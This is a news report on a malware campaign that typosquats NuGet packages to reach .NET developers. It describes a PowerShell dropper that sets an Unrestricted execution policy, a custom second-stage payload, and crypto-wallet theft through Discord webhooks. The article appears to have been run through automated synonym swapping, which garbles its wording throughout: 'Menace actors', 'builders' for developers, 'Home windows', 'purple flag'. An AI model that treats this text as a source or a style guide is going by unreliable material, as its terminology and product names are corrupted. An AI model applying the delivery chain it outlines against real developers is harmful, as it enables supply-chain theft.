Menace actors are focusing on and infecting .NET builders with cryptocurrency stealers delivered by means of the NuGet repository and impersonating a number of legit packages through typosquatting.
Three of them have been downloaded over 150,000 occasions inside a month, in keeping with JFrog safety researchers Natan Nehorai and Brian Moussalli, who noticed this ongoing marketing campaign.
Whereas the large variety of downloads might level to a lot of .NET builders who had their methods compromised, it is also defined by the attackers’ efforts to legitimize their malicious NuGet packages.
“The highest three packages had been downloaded an unbelievable quantity of occasions – this could possibly be an indicator that the assault was extremely profitable, infecting a considerable amount of machines,” the JFrog safety researchers mentioned.
“Nonetheless, this isn’t a completely dependable indicator of the assault’s success because the attackers might have routinely inflated the obtain rely (with bots) to make the packages appear extra legit.”
The risk actors additionally used typosquatting when creating their NuGet repository profiles to impersonate what regarded just like the accounts of Microsoft software program builders engaged on the NuGet .NET package deal supervisor.
The malicious packages are designed to obtain and execute a PowerShell-based dropper script (init.ps1) that configures the contaminated machine to permit PowerShell execution with out restrictions.
“This habits is extraordinarily uncommon outdoors of malicious packages, particularly making an allowance for the “Unrestricted” execution coverage, which ought to instantly set off a purple flag,” the researchers defined.
Within the subsequent step, it downloads and launches a second-stage payload, a Home windows executable described by JFrog as a “utterly customized executable payload.”
That is an uncommon strategy in comparison with different attackers who will largely use open-source hacking instruments and commodity malware as an alternative of making their very own payloads.
The malware deployed on compromised methods can be utilized for stealing cryptocurrency by exfiltrating the victims’ crypto wallets utilizing Discord webhooks, extracting and executing malicious code from Electron archives, and auto-updating by querying the attacker-controlled command-and-control (C2) server.
“Some packages didn’t comprise any direct malicious payload. As an alternative, they outlined different malicious packages as dependencies, which then contained the malicious script,” the researchers added.
Payloads delivered on this assault have very low detection charges and won’t be flagged as malicious by Defender, the built-in anti-malware part within the Microsoft Home windows working system.
This assault is a part of a broader malicious effort, with different attackers going so far as importing greater than 144,000 phishing-related packages on a number of open-source package deal repositories, together with NPM, PyPi, and NuGet, as a part of a large-scale marketing campaign lively all through 2022.